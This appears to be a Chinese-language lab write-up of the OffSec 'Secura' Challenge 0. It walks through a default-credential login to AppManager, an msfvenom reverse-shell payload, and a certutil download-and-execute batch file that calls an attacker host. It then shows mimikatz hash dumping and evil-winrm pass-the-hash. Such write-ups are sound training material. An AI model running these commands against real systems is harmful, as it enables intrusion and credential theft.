Challenge 0 - Secura(1)
Challenge 0 - Secura(1)
Offsec 在九月底的時候 LAB 推出了 Challenge 0,會取名 0 應該是相對簡單的,打打看吧
環境說明共三台機器,簡單掃了一下
- 95 : Web Server 感覺像是進入點
- 96 : DB 伺服器
- 97 : DC
95 8443 Port 打開是 AppManager14 版本是 14710
使用預設帳號密碼 admin:admin 可以直接登入
跑了一下 Metasploit 與 Exploit 針對 14700 的漏洞利用看來都沒有成功
5001 /
自己建立一個 payload,└─$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.179 LPORT=443 -b '\x00\x01\x0d' -f exe -o revershell.exe
接著在 Admin --> Upload Files / Binaries 頁面選擇 [ Upload Script to <Product_Home>/working ]
設定執行的檔案為 cmd.bat
建立一個 cmd.bat,內容如下
certutil.exe -f -urlcache -split http://192.168.45.179/lab0/95/revershell.exe c:\windows\temp\revershell.exe && cmd.exe /c c:\windows\temp\revershell.exe
上傳 cmd.bat
執行該 Script,成功拿到 Rever Shell
whoami 看一下,進來就是 nt authority\system 直接拿 flag
跑一下 mimikatz.exe
administrator NTLM HASH a51493b0b06e5e35f855245e71af1d14
測試看看 evil-winrm 沒有問題
└─$ evil-winrm -i 192.168.204.95 -u administrator -H "a51493b0b06e5e35f855245e71af1d14"
更新一下靶機資訊
更新帳號密碼表
留言
張貼留言